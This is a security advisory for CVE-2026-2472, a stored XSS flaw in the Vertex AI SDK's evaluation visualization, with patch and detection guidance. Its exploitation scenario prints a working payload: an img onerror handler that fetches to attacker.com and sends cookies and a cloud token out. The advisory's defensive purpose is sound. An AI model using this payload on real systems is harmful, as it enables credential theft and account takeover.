CVE-2026-2472

GHSA-qv8j-hgpc-vrq8 HIGH
Published February 20, 2026
CISO Take

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

Affected Systems

Package Ecosystem Vulnerable Range Patched
google-cloud-aiplatform pip >= 1.98.0, < 1.131.0 1.131.0

Do you use google-cloud-aiplatform? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Moderate

Recommended Action

  1. 1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform. 2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data. 3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization. 4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation. 5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions. 6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2.3 - AI system inputs A.6.2.6 - AI System Security A.8.4 - AI Data Quality and Integrity
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place that address AI risks associated with third-party entities MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems MANAGE-2.2 - Mechanisms to respond to AI risks
OWASP LLM Top 10
LLM02 - Insecure Output Handling LLM02:2025 - Insecure Output Handling

Technical Details

NVD Description

Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.

Exploitation Scenario

An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.

Timeline

Published
February 20, 2026
Last Modified
February 27, 2026
First Seen
March 24, 2026